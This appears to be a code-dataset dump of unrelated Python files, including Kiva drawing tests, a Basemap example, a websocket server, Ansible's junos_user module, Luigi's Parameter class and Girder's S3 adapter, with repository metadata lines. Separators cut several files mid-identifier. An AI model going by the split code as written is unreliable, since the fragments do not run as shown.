with self.draw_and_check():
self.gc.begin_path()
self.gc.rect(0, 0, 200, 200)
self.gc.stroke_path()
def test_circle(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.arc(150, 150, 100, 0.0, 2 * numpy.pi)
self.gc.stroke_path()
def test_quarter_circle(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.arc(150, 150, 100, 0.0, numpy.pi / 2)
self.gc.stroke_path()
def test_text(self):
with self.draw_and_check():
font = Font(family=MODERN)
font.size = 24
self.gc.set_font(font)
self.gc.set_text_position(23, 67)
self.gc.show_text("hello kiva")
def test_circle_fill(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.arc(150, 150, 100, 0.0, 2 * numpy.pi)
self.gc.fill_path()
def test_star_fill(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.move_to(100, 100)
self.gc.line_to(150, 200)
self.gc.line_to(200, 100)
self.gc.line_to(100, 150)
self.gc.line_to(200, 150)
self.gc.line_to(100, 100)
self.gc.fill_path()
def test_star_eof_fill(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.move_to(100, 100)
self.gc.line_to(150, 200)
self.gc.line_to(200, 100)
self.gc.line_to(100, 150)
self.gc.line_to(200, 150)
self.gc.line_to(100, 100)
self.gc.eof_fill_path()
def test_circle_clip(self):
with self.draw_and_check():
self.gc.clip_to_rect(150, 150, 100, 100)
self.gc.begin_path()
self.gc.arc(150, 150, 100, 0.0, 2 * numpy.pi)
self.gc.fill_path()
def test_text_clip(self):
with self.draw_and_check():
self.gc.clip_to_rect(23, 77, 100, 23)
font = Font(family=MODERN)
font.size = 24
self.gc.set_font(font)
self.gc.set_text_position(23, 67)
self.gc.show_text("hello kiva")
def test_star_clip(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.move_to(100, 100)
self.gc.line_to(150, 200)
self.gc.line_to(200, 100)
self.gc.line_to(100, 150)
self.gc.line_to(200, 150)
self.gc.line_to(100, 100)
self.gc.close_path()
self.gc.clip()
self.gc.begin_path()
self.gc.arc(150, 150, 100, 0.0, 2 * numpy.pi)
self.gc.fill_path()
#### Required methods ####################################################
@contextlib.contextmanager
def draw_and_check(self):
""" A context manager to check the result.
"""
raise NotImplementedError()
def create_graphics_context(self, width, length):
""" Create the desired graphics context
"""
raise NotImplementedError()
class DrawingImageTester(DrawingTester):
""" Basic drawing tests for graphics contexts of gui toolkits.
"""
@contextlib.contextmanager
def draw_and_check(self):
yield
filename = "{0}.png".format(self.filename)
self.gc.save(filename)
self.assertImageSavedWithContent(filename)
def assertImageSavedWithContent(self, filename):
""" Load the image and check that there is some content in it.
"""
image = numpy.array(Image.open(filename))
# default is expected to be a totally white image
self.assertEqual(image.shape[:2], (300, 300))
if image.shape[2] == 3:
check = numpy.sum(image == [255, 0, 0], axis=2) == 3
elif image.shape[2] == 4:
check = numpy.sum(image == [255, 0, 0, 255], axis=2) == 4
else:
self.fail(
'Pixel size is not 3 or 4, but {0}'.format(image.shape[2]))
if check.any():
return
self.fail('The image looks empty, no red pixels where drawn')
|
jenshnielsen/basemap
|
examples/maskoceans.py
|
Python
|
gpl-2.0
| 1,922
| 0.021852
|
from mpl_toolkits.basemap import Basemap, shiftgrid, maskoceans, interp
import numpy as np
import matplotlib.pyplot as plt
# example showing how to mask out 'wet' areas on a contour or pcolor plot.
topodatin = np.loadtxt('etopo20data.gz')
lonsin = np.loadtxt('etopo20lons.gz')
latsin = np.loadtxt('etopo20lats.gz')
# shift data so lons go from -180 to 180 instead of 20 to 380.
topoin,lons1 = shiftgrid(180.,topodatin,lonsin,start=False)
lats1 = latsin
fig=plt.figure()
# setup basemap
m=Basemap(resolution='l',projection='lcc',lon_0=-100,lat_0=40,width=8.e6,height=6.e6)
lons, lats = np.meshgrid(lons1,lats1)
x, y = m(lons, lats)
# interpolate land/sea mask to topo grid, mask ocean values.
# output may look 'blocky' near coastlines, since data is at much
# lower resolution than land/sea mask.
topo = maskoceans(lons, lats, topoin)
# make contour plot (ocean values w
|
ill be masked)
CS=m.contourf(x,y,topo,np.arange(-300,3001,50),cmap=plt.cm.jet,extend='both')
#im=m.pcolormesh(x,y,topo,cmap=plt.cm.jet,vmin=-300,vmax=3000)
# draw coastlines.
m.drawcoastlines()
plt.title('ETOPO data with marine areas masked (original grid)')
fig=plt.figure()
# interpolate topo data to higher resolution grid (to better match
# the land/sea mask). Output looks less 'blocky' near coastlines.
nlats = 3*topoin.shape[0]
nlons = 3*topoin.shape[1]
lons = np.linspace(-180,180,nlons)
lats = np.linsp
|
ace(-90,90,nlats)
lons, lats = np.meshgrid(lons, lats)
x, y = m(lons, lats)
topo = interp(topoin,lons1,lats1,lons,lats,order=1)
# interpolate land/sea mask to topo grid, mask ocean values.
topo = maskoceans(lons, lats, topo)
# make contour plot (ocean values will be masked)
CS=m.contourf(x,y,topo,np.arange(-300,3001,50),cmap=plt.cm.jet,extend='both')
#im=m.pcolormesh(x,y,topo,cmap=plt.cm.jet,vmin=-300,vmax=3000)
# draw coastlines.
m.drawcoastlines()
plt.title('ETOPO data with marine areas masked (data on finer grid)')
plt.show()
|
freedesktop-unofficial-mirror/zeitgeist__zeitgeist
|
examples/python/find_events.py
|
Python
|
lgpl-2.1
| 1,009
| 0.011893
|
from gi.repository import Zeitgeist, GLib
log = Zeitgeist.Log.get_default()
mainloop = GLib.MainLoop()
def on_events_received(log, result, data):
events = log.find_events_finish(result)
for i in xrange(events.size()):
event = events.next_value()
if event:
print "Event id:", event.get_property("id")
for i in xrange(event.num_subjects()):
subj = event.get_subject(i)
print " -", subj.get_property("uri")
mainloop.quit()
subject = Zeitgeist.Subject.full("", Zeitgeist.AUDIO, "", "", "", "", "")
event = Zeitge
|
ist.Event()
event.add_subject(subject)
time_range = Zeitgeist.TimeRange.anytime ();
log.find_events(time_range,
[event],
Zeitgeist.StorageState.ANY,
20,
Zeitgeist.ResultType.MOST_RECENT_SUBJECTS,
None,
on_events_rec
|
eived,
None)
mainloop.run()
|
ggimenez/HomeworkDesigner.activity
|
template.activity/simpleassociation.py
|
Python
|
gpl-2.0
| 17,950
| 0.036331
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pygtk
pygtk.require('2.0')
import gtk
import json
from collections import namedtuple
from array import *
import pango
import random
from gettext import gettext as _
import copy
''' Scales '''
IMAGES_SCALE = [100, 100]
LETTERS_SCALE = [100, 100]
'''Color Selection association
Reference of colours codes :http://www.rapidtables.com/web/color/RGB_Color.htm
'''
COLOURS_ASSOCIATION = []
COLOURS_ASSOCIATION.append({"colour":"#0074DF", "available":True})
COLOURS_ASSOCIATION.append({"colour":"#FF1F68", "available":True})
COLOURS_ASSOCIATION.append({"colour":"#D9E021", "available":True})
COLOURS_ASSOCIATION.append({"colour":"#6FC72B", "available":True})
COLOURS_ASSOCIATION.append({"colour":"#F1C001", "available":True})
EVENTBOX_SCALE = [100,100]
'''Curren item selection association'''
SELECTED_COLOUR = gtk.gdk.Color("#FFFF00")
FONT_DESCRIPTION_BIG = 'DejaVu Bold 30'
FONT_DESCRIPTION_MEDIUM = 'DejaVu Bold 15'
class SimpleAssociation():
def saveExerciseState(self):
self.mainWindows.getLogger().debug("Inside to saveExerciseState")
stateJson = {}
stateJson['optionsSelectionState'] = self.optionsSelectionState
stateJson['correspondencesSelectionState'] = self.correspondencesSelectionState
stateJson['currentOptionSelected'] = self.currentOptionSelected
stateJson['lastOptionSelected'] = self.lastOptionSelected
stateJson['currentCorrespondenceSelected'] = self.currentCorrespondenceSelected
stateJson['lastCorrespondenceSelected'] = self.lastCorrespondenceSelected
stateJson['optionsList'] = self.optionsList
stateJson['correspondencesList'] = self.correspondencesList
stateJson['COLOURS_ASSOCIATION'] = self.COLOURS_ASSOCIATION
stateJson['exerciseCompleted'] = self.exerciseCompleted
return stateJson
def disconnectEventBoxs(self):
for index, eventBox in enumerate(self.allEventBoxs):
eventBox.disconnect(self.idHandlers[index])
def getWindow(self, exercise, mainWindows, stateJson):
self.mainWindows = mainWindows
windowSimpleAssociation = gtk.ScrolledWindow()
windowSimpleAssociation.exerciseInstance = self
label = gtk.Label(exercise.name)
label.modify_font(pango.FontDescription("Sans 10"))
vBoxWindows = gtk.VBox(False, 5)
hBoxExercises = gtk.HBox(False, 5)
self.vBoxOptions = gtk.VBox(False, 5)
self.vBoxOptions.set_border_width(10)
self.vBoxCorrespondences = gtk.VBox(False, 5)
self.vBoxCorrespondences.set_border_width(10)
frameExercises = gtk.Frame()
frameExercises.add(hBoxExercises)
self.idHandlers = []
self.a
|
llEventBoxs = []
self.exerciseCompleted = False
if stateJson is None:
self.optionsSelectionState = []
self.correspondencesSelectionState = []
self.currentOptionSelected = -1
self.lastOptionSelected = -1
self.currentCorrespondenceSelected = -1
self.lastCorresponde
|
nceSelected = -1
self.optionsList, self.correspondencesList = self.disorderCorrespondences(exercise.items)
self.COLOURS_ASSOCIATION = COLOURS_ASSOCIATION
else:
self.optionsSelectionState = stateJson['optionsSelectionState']
self.correspondencesSelectionState = stateJson['correspondencesSelectionState']
self.currentOptionSelected = stateJson['currentOptionSelected']
self.lastOptionSelected = stateJson['lastOptionSelected']
self.currentCorrespondenceSelected = stateJson['currentCorrespondenceSelected']
self.lastCorrespondenceSelected = stateJson['lastCorrespondenceSelected']
self.optionsList = stateJson['optionsList']
self.correspondencesList = stateJson['correspondencesList']
self.COLOURS_ASSOCIATION = stateJson['COLOURS_ASSOCIATION']
self.exerciseCompleted = stateJson['exerciseCompleted']
self.mainWindows.getLogger().debug( self.COLOURS_ASSOCIATION )
firstOptionEventBox = None
frameVBoxOptions = gtk.Frame()
frameVBoxOptions.set_border_width(10)
#dark orange
frameVBoxOptions.modify_bg(gtk.STATE_NORMAL, gtk.gdk.Color("#FF8C00"))
frameVBoxCorrespondences = gtk.Frame()
frameVBoxCorrespondences.set_border_width(10)
#dark slate blue
frameVBoxCorrespondences.modify_bg(gtk.STATE_NORMAL, gtk.gdk.Color('#483D8B'))
for index, option in enumerate(self.optionsList):
'''Options'''
self.mainWindows.getLogger().debug(option)
eventBoxOption = self.createEventBox(option['option']['value'], option['option']['type'])
if not self.exerciseCompleted:
idHandler = eventBoxOption.connect("button-press-event", self.imageSelectedCallBack, self.vBoxCorrespondences)
self.allEventBoxs.append(eventBoxOption)
self.idHandlers.append(idHandler)
self.addEventBoxToVBox(eventBoxOption, self.vBoxOptions)
if index == 0:
firstOptionEventBox = eventBoxOption
if stateJson is None:
self.optionsSelectionState.append ( {"selected": -1, "pair": option['indexPair'], "colour": None} )
'''Correspondences'''
eventBoxCorrespondence = ( self.createEventBox(self.correspondencesList[index]['correspondence']['value'],
self.correspondencesList[index]['correspondence']['type']) )
if not self.exerciseCompleted:
idHandler = eventBoxCorrespondence.connect("button_press_event", self.pairSelectedCallBack, self.vBoxOptions)
self.allEventBoxs.append(eventBoxCorrespondence)
self.idHandlers.append(idHandler)
self.addEventBoxToVBox(eventBoxCorrespondence, self.vBoxCorrespondences)
if stateJson is None:
( self.correspondencesSelectionState.append( {"selected": -1,
"pair":self.correspondencesList[index]['indexPair'], "colour": None} ) )
frameVBoxOptions.add(self.vBoxOptions)
frameVBoxCorrespondences.add(self.vBoxCorrespondences)
hBoxExercises.pack_start(frameVBoxOptions, True,True,5)
hBoxExercises.pack_start(frameVBoxCorrespondences, True,True,50)
vBoxWindows.pack_start(frameExercises, True,True,0)
windowSimpleAssociation.add_with_viewport(vBoxWindows)
if stateJson is not None:
self.repaintResumeItems()
else:
self.setAllAvailableSelectionColour()
self.selectFirtImage(firstOptionEventBox)
return windowSimpleAssociation
def repaintResumeItems(self):
for index, value in enumerate(self.optionsSelectionState):
eventBoxOption = self.vBoxOptions.get_children()[index].get_children()[0]
eventBoxCorrespondence = self.vBoxCorrespondences.get_children()[index].get_children()[0]
if value['colour'] is not None:
self.mainWindows.getLogger().debug(value)
self.changeBackgroundColour(eventBoxOption,str(value['colour']['colour']))
valueCorresondence = self.correspondencesSelectionState[index]
self.mainWindows.getLogger().debug(valueCorresondence)
if valueCorresondence['colour'] is not None:
self.changeBackgroundColour(eventBoxCorrespondence, str(valueCorresondence['colour']['colour']))
firstFrameOption = self.vBoxOptions.get_children()[self.currentOptionSelected]
self.fakeSelection(firstFrameOption)
def addEventBoxToVBox(self, eventBox, vBox):
frameEventBox = gtk.EventBox()
frameEventBox.modify_bg(gtk.STATE_NORMAL, gtk.gdk.Color("white"))
eventBox.set_border_width(5)
frameEventBox.add(eventBox)
vBox.pack_start(frameEventBox, False,False,0)
def createEventBox(self, payload, typePayload):
eventBox = gtk.EventBox()
eventBox.set_size_request(EVENTBOX_SCALE[0], EVENTBOX_SCALE[1])
if typePayload == "image":
imageContainer = gtk.Image()
pixbuf = gtk.gdk.pixbuf_new_from_file(payload).scale_simple(IMAGES_SCALE[0], IMAGES_SCALE[1], 2)
imageContainer.set_from_pixbuf(pixbuf)
eventBox.add(imageContainer)
eventBox.modify_bg(gtk.STATE_NORMAL, eventBox.get_colormap().alloc_color('white'))
if typePayload == "letter":
letterLabel = gtk.Label(payload)
if len(payload) <= 8:
letterLabel.modify_font(pango.FontDescription(FONT_DESCRIPTION_BIG))
else:
letterLabel.modify_font(pango.FontDescription(FONT_DESCRIPTION_MEDIUM))
eventBox.add(letterLabel)
eventBox.modify_bg(gtk.STATE_NORMAL, eventBox.get_colormap().alloc_color('white'))
return eventBox
def selectFirtImage(self, firstEvenBox):
ava
|
fos/fos-legacy
|
scratch/very_scratch/server/example7/webSocketServer.py
|
Python
|
bsd-3-clause
| 4,050
| 0.008889
|
#!/usr/bin/env python
import sys
import time
import socket
import threading
import Queue
import ConfigParser
import logging as log
from connection import *
from connectionManager import *
log.basicConfig(level=log.DEBUG, stream=sys.stderr)
#Dynamically instantiate an instance of an Application-derived class from a module
#The module must provide an Instantiate() method
def InstantiateApplication(moduleName, *classArgs):
module = __import__(moduleName)
log.info("InstantiateApplication - Module: " + repr(module))
classInstance = module.Instantiate(*classArgs)
log.info( repr(classInstance) )
return classInstance
#
#MAIN
#
if __name__ == "__main__":
log.info('Loading configuration info')
config = ConfigParser.ConfigParser()
config.read('config.txt')
port = config.getint('Server', 'Port')
connectionQueueSize = config.getint('Server', 'ConnectionQueueSize')
#Start applications
log.info('Loading Applications...')
applications = {}
#Admin app
adminApp = InstantiateApplication('AdminApplication', 'admin')
applications['/'] = adminApp
adminAppThread = threading.Thread(target=adminApp.Run).start()
#Dynamically load applications specified in config.txt
applicationList = config.items('Applications')
for application in applicationList:
appModuleName = application[1]
appInstanceName = application[0]
log.info('\tLoading instance of application %s as %s' % (appModuleName, appInstanceName))
applicationInstance = InstantiateApplication(appModuleName, appInstanceName)
applications['/' + appInstanceName] = applicationInstance
applicationThread = threading.Thread(target=applicationInstance.Run).start()
log.info("Applications Loaded:")
log.info(repr(applications))
#done with config
del config
log.info('Starting web socket server')
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serverSocket.bind( ('', port) )
serverSocket.listen(connectionQueueSize)
del port
del connectionQueueSize
#Start connection manager
connectionManager = ConnectionManager()
connectionManagerThread = threading.Thread(target=connectionManager.Run).start()
#Accept clients
try:
while 1:
log.info('Waiting to accept client connection...')
clientSocket,
|
clientAddress = serverSocket.accept()
try:
log.info('Got client connection from %s' % (repr(clientAddress)))
connection = Connection(clientSocket, clientAddress)
log.info('Client %s requested %s application' % (repr(clientAddress), connection.ApplicationPath))
if connection.ApplicationPath in applications:
|
requestedApp = applications[connection.ApplicationPath]
log.info('Client %s requested app: %s ' % (repr(clientAddress), repr(requestedApp)))
if requestedApp.AddClient(connection) == True:
connectionManager.AddConnection(connection)
else:
connection.Close()
connection = None
else:
log.info("Client %s requested an unknown Application. Closing connection." % repr(clientAddress))
connection.Close()
connection = None
except Exception as ex:
log.info('Execption occurred while attempting to establish client connection from %s.' % repr(clientAddress))
log.info(repr(ex))
except Exception as ex:
log.info('Server encountered an unhandled exception.')
log.info(repr(ex))
log.info('Web socket server closing.')
|
dataxu/ansible
|
lib/ansible/modules/network/junos/junos_user.py
|
Python
|
gpl-3.0
| 11,343
| 0.001851
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2017, Ansible by Red Hat, inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = """
---
module: junos_user
version_added: "2.3"
author: "Peter Sprygada (@privateip)"
short_description: Manage local user accounts on Juniper JUNOS devices
description:
- This module manages locally configured user accounts on remote
network devices running the JUNOS operating system. It provides
a set of arguments for creating, removing and updating locally
defined accounts
extends_documentation_fragment: junos
options:
aggregate:
description:
- The C(aggregate) argument defines a list of users to be configured
on the remote device. The list of users will be compared against
the current users and only changes will be added or removed from
the device configuration. This argument is mutually exclusive with
the name argument.
version_added: "2.4"
required: False
default: null
aliases: ['users', 'collection']
name:
description:
- The C(name) argument defines the username of the user to be created
on the system. This argument must follow appropriate usernaming
conventions for the target device running JUNOS. This argument is
mutually exclusive with the C(aggregate) argument.
required: false
default: null
full_name:
description:
- The C(full_name) argument provides the full name of the user
account to be created on the remote device. This argument accepts
any text string value.
required: false
default: null
role:
description:
- The C(role) argument defines the role of the user account on the
remote system. User accounts can have more than one role
configured.
required: false
choices: ['operator', 'read-only', 'super-user', 'unauthorized']
sshkey:
description:
- The C(sshkey) argument defines the public SSH key to be configured
for the user account on the remote system. This argument must
be a valid SSH key
required: false
default: null
purge:
description:
- The C(purge) argument instructs the module to consider the
users definition absolute. It will remove any previously configured
users on the device with the exception of the current defined
set of aggregate.
required: false
default: false
state:
description:
- The C(state) argument configures the state of the user definitions
as it relates to the device operational configuration. When set
to I(present), the user should be configured in the device active
configuration and when set to I(absent) the user should not be
in the device active configuration
required: false
default: present
choices: ['present', 'absent']
active:
description:
- Specifies whether or not the configuration is active or deactivated
default: True
choices: [True, False]
version_added: "2.4"
requirements:
- ncclient (>=v0.5.2)
notes:
- This module requires the netconf system service be enabled on
the remote device being managed.
- Tested against vSRX JUNOS version 15.1X49-D15.4, vqfx-10000 JUNOS Version 15.1X53-D60.4.
- Recommended connection is C(netconf). See L(the Junos OS Platform Options,../network/user_guide/platform_junos.html).
- This module also works with C(local) connections for legacy playbooks.
"""
EXAMPLES = """
- name: create new user account
junos_user:
name: ansible
role: super-user
sshkey: "{{ lookup('file', '~/.ssh/ansible.pub') }}"
state: present
- name: remove a user account
junos_user:
name: ansible
state: absent
- name: remove all user accounts except ansible
junos_user:
aggregate:
- name: ansible
purge: yes
- name: Create list of users
junos_user:
aggregate:
- {name: test_user1, full_name: test_user2, role: operator, state: present}
- {name: test_user2, full_name: test_user2, role: read-only, state: present}
- name: Delete list of users
junos_user:
aggregate:
- {name: test_user1, full_name: test_user2, role: operator, state: absent}
- {name: test_user2, full_name: test_user2, role: read-only, state: absent}
"""
RETURN = """
diff.prepared:
description: Configuration difference before and after applying change.
returned: when configuration is changed and diff option is enabled.
type: string
sample: >
[edit system login]
+ user test-user {
+ uid 2005;
+ class read-only;
+ }
"""
from functools import partial
from copy import deepcopy
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.utils import remove_default_spec
from ansible.module_utils.network.junos.junos import junos_argument_spec, get_connection
from ansible.module_utils.network.junos.junos import commit_configuration, discard_changes
from ansible.module_utils.network.junos.junos import load_config, locked_config
from ansible.module_utils.six import iteritems
try:
from lxml.etree import Element, SubElement, tostring
except ImportError:
from xml.etree.ElementTree import Element, SubElement, tostring
ROLES = ['operator', 'read-only', 'super-user', 'unauthorized']
USE_PERSISTENT_CONNECTION = True
def handle_purge(module, want):
want_users = [item['name'] for item in want]
element = Element('system')
login = SubElement(element, 'login')
conn = get_connection(module)
reply = conn.execute_rpc(tostring(Element('get-configuration')), ignore_warning=False)
users = reply.xpath('configuration/system/login/user/name')
if users:
for item in users:
name = item.text
if name not in want_users and name != 'root':
user = SubElement(login, 'user', {'operation': 'delete'})
SubElement(user, 'name').text = name
if element.xpath('/system/login/user/name'):
return element
def map_obj_to_ele(module, want):
element = Element('system')
login = SubElement(element, 'login')
for item in want:
if item['state'] != 'present':
if item['name'] == 'root':
module.fail_json(msg="cannot delete the 'root' account.")
operation = 'delete'
else:
operation = 'merge'
user = SubElement(login, 'user', {'operation': operation})
SubElement(user, 'name').text = item['name']
if operation == 'merge':
if it
|
em['active']:
user.set('active', 'active'
|
)
else:
user.set('inactive', 'inactive')
if item['role']:
SubElement(user, 'class').text = item['role']
if item.get('full_name'):
SubElement(user, 'full-name').text = item['full_name']
if item.get('sshkey'):
auth = SubElement(user, 'authentication')
ssh_rsa = SubElement(auth, 'ssh-rsa')
key = SubElement(ssh_rsa, 'name').text = item['sshkey']
return element
def get_param_value(key, item, module):
# if key doesn't exist in the item, get it from module.params
if not item.get(key):
value = module.params[key]
# if key does exist, do a type check on it to validate it
else:
value_type = module.argument_spec[key].get('type', 'str')
type_checker = module._CHECK_ARGUMENT_TYPES_DISPATCHER[value_type]
type_checker(item[key])
value = item[key]
# validate the param value (if validator func exists)
validator = globals().get('validate_%s' % key)
if all((value, validator)):
validator(value, module)
return value
def map_params_to_obj(module):
aggregate = module.params['aggregate']
if not ag
|
nagyistoce/devide
|
modules/vtk_basic/vtkRecursiveDividingCubes.py
|
Python
|
bsd-3-clause
| 506
| 0.001976
|
# class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
clas
|
s vtkRecursiveDividingCubes(SimpleVTKClassModuleB
|
ase):
def __init__(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkRecursiveDividingCubes(), 'Processing.',
('vtkImageData',), ('vtkPolyData',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None)
|
linearregression/luigi
|
luigi/parameter.py
|
Python
|
apache-2.0
| 20,682
| 0.003771
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
''' Parameters are one of the core concepts of Luigi.
All Parameters sit on :class:`~luigi.task.Task` classes.
See :ref:`Parameter` for more info on how to define parameters.
'''
import datetime
import warnings
try:
from ConfigParser import NoOptionError, NoSectionError
except ImportError:
from configparser import NoOptionError, NoSectionError
from luigi import six
from luigi import configuration
from luigi.deprecate_kwarg import deprecate_kwarg
_no_value = object()
class ParameterException(Exception):
"""
Base exception.
"""
pass
class MissingParameterException(ParameterException):
"""
Exception signifying that there was a missing Parameter.
"""
pass
class UnknownParameterException(ParameterException):
"""
Exception signifying that an unknown Parameter was supplied.
"""
pass
class DuplicateParameterException(ParameterException):
"""
Exception signifying that a Parameter was specified multiple times.
"""
pass
class UnknownConfigException(ParameterException):
"""
Exception signifying that the ``config_path`` for the Parameter could not be found.
"""
pass
class Parameter(object):
"""
An untyped Parameter
Parameters are objects set on the Task class level to make it possible to parameterize tasks.
For instance:
class MyTask(luigi.Task):
foo = luigi.Parameter()
This makes it possible to instantiate multiple tasks, eg ``MyTask(foo='bar')`` and
``MyTask(foo='baz')``. The task will then have the ``foo`` attribute set appropriately.
There are subclasses of ``Parameter`` that define what type the parameter has. This is not
enforced within Python, but are used for command line interaction.
When a task is instantiated, it will first use any argument as the value of the parameter, eg.
if you instantiate a = TaskA(x=44) then a.x == 44. If this does not exist, it will use the value
of the Parameter object, which is defined on a class level. This will be resolved in this
order of falling priority:
* Any value provided on the command line on the class level (eg. ``--TaskA-param xyz``)
* Any value provided via config (using the ``config_path`` argument)
* Any default value set using the ``default`` flag.
"""
counter = 0
"""non-atomically increasing counter used for ordering parameters."""
@deprecate_kwarg('is_boolean', 'is_bool', False)
def __init__(self, default=_no_value, is_list=False, is_boolean=False, is_global=False, significant=True, description=None,
config_path=None, positional=True):
"""
:param default: the default value for this parameter. This should match the type of the
Parameter, i.e. ``datetime.date`` for ``DateParameter`` or ``int`` for
``IntParameter``. By default, no default is stored and
the value must be specified at runtime.
:param bool is_list: specify ``True`` if the parameter should allow a list of values rather
|
than a single value. Default: ``False``. A list has an implicit default
value of ``[]``.
:param bool is_bool: specify ``True`` if the parameter is a bool value. Defau
|
lt:
``False``. Bool's have an implicit default value of ``False``.
:param bool significant: specify ``False`` if the parameter should not be treated as part of
the unique identifier for a Task. An insignificant Parameter might
also be used to specify a password or other sensitive information
that should not be made public via the scheduler. Default:
``True``.
:param str description: A human-readable string describing the purpose of this Parameter.
For command-line invocations, this will be used as the `help` string
shown to users. Default: ``None``.
:param dict config_path: a dictionary with entries ``section`` and ``name``
specifying a config file entry from which to read the
default value for this parameter. DEPRECATED.
Default: ``None``.
:param bool positional: If true, you can set the argument as a
positional argument. Generally we recommend ``positional=False``
as positional arguments become very tricky when
you have inheritance and whatnot.
"""
# The default default is no default
self.__default = default
self.__global = _no_value
self.is_list = is_list
self.is_bool = is_boolean and not is_list # Only BoolParameter should ever use this. TODO(erikbern): should we raise some kind of exception?
if is_global:
warnings.warn("is_global support is removed. Assuming positional=False",
DeprecationWarning,
stacklevel=2)
positional = False
self.significant = significant # Whether different values for this parameter will differentiate otherwise equal tasks
self.positional = positional
self.description = description
if config_path is not None and ('section' not in config_path or 'name' not in config_path):
raise ParameterException('config_path must be a hash containing entries for section and name')
self.__config = config_path
self.counter = Parameter.counter # We need to keep track of this to get the order right (see Task class)
Parameter.counter += 1
def _get_value_from_config(self, section, name):
"""Loads the default from the config. Returns _no_value if it doesn't exist"""
conf = configuration.get_config()
try:
value = conf.get(section, name)
except (NoSectionError, NoOptionError):
return _no_value
if self.is_list:
return tuple(self.parse(p.strip()) for p in value.strip().split('\n'))
else:
return self.parse(value)
def _get_value(self, task_name=None, param_name=None):
if self.__global != _no_value:
return self.__global
if task_name and param_name:
v = self._get_value_from_config(task_name, param_name)
if v != _no_value:
return v
v = self._get_value_from_config(task_name, param_name.replace('_', '-'))
if v != _no_value:
warnings.warn(
'The use of the configuration [%s] %s (with dashes) should be avoided. Please use underscores.' %
(task_name, param_name), DeprecationWarning, stacklevel=2)
return v
if self.__config:
v = self._get_value_from_config(self.__config['section'], self.__config['name'])
if v != _no_value and task_name and param_name:
warnings.warn(
'The use of the configuration [%s] %s is deprecated. Please use [%s] %s' %
(self.__config['section'], self.__config['name'], task_name, param_name),
DeprecationWarning, stacklevel=2)
if v != _no_value:
return v
if self.__default != _no_value:
return sel
|
essamjoubori/girder
|
girder/utility/s3_assetstore_adapter.py
|
Python
|
apache-2.0
| 29,780
| 0.000269
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2014 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import boto
import boto.s3.connection
import cherrypy
import json
import re
import requests
import six
import uuid
from .abstract_assetstore_adapter import AbstractAssetstoreAdapter
from girder.models.model_base import ValidationException
from girder import logger, events
BUF_LEN = 65536 # Buffer size for download stream
boto.config.add_section('s3')
boto.config.set('s3', 'use-sigv4', 'True')
def authv4_determine_region_name(self, *args, **kwargs):
"""
The boto method auth.S3HmacAuthV4Handler.determine_region_name fails when
the url is an IP address or localhost. For testing, we need to have this
succeed. This wraps the boto function and, if it fails, adds a fall-back
value.
"""
try:
result = authv4_orig_determine_region_name(self, *args, **kwargs)
except UnboundLocalError:
result = 'us-east-1'
return result
def required_auth_capability_wrapper(fun):
def wrapper(self, *args, **kwargs):
if self.anon:
return ['anon']
else:
return fun(self, *args, **kwargs)
return wrapper
authv4_orig_determine_region_name = \
boto.auth.S3HmacAuthV4Handler.determine_region_name
boto.auth.S3HmacAuthV4Handler.determine_region_name = \
authv4_determine_region_name
boto.s3.connection.S3Connection._required_auth_capability = \
required_auth_capability_wrapper(
boto.s3.connection.S3Connection._required_auth_capability)
def _generate_url_sigv4(self, expires_in, method, bucket='', key='',
headers=None, response_headers=None, version_id=None,
iso_date=None, params=None):
"""
The version of this method in boto.s3.connection.S3Connection does not
support signing custom query parameters, which is necessary for presigning
multipart upload requests. This implementation does, but should go away
once https://github.com/boto/boto/pull/3322 is merged and released.
"""
path = self.calling_format.build_path_base(bucket, key)
auth_path = self.calling_format.build_auth_path(bucket, key)
host = self.calling_format.build_host(self.server_name(), bucket)
if host.endswith(':443'):
host = host[:-4]
if params is None:
params = {}
if version_id is not None:
params['VersionId'] = version_id
http_request = self.build_base_http_request(
method, path, auth_path, headers=headers, host=host, params=params)
return self._auth_handler.presign(http_request, expires_in,
iso_date=iso_date)
class S3AssetstoreAdapter(AbstractAssetstoreAdapter):
"""
This assetstore type stores files on S3. It is responsible for generating
HMAC-signed messages that authorize the client to communicate directly with
the S3 server where the files are stored.
"""
CHUNK_LEN = 1024 * 1024 * 32 # Chunk size for uploading
HMAC_TTL = 120 # Number of seconds each signed message is valid
@staticmethod
def validateInfo(doc):
"""
Makes sure the root field is a valid absolute path and is writeable.
"""
if 'prefix' not in doc:
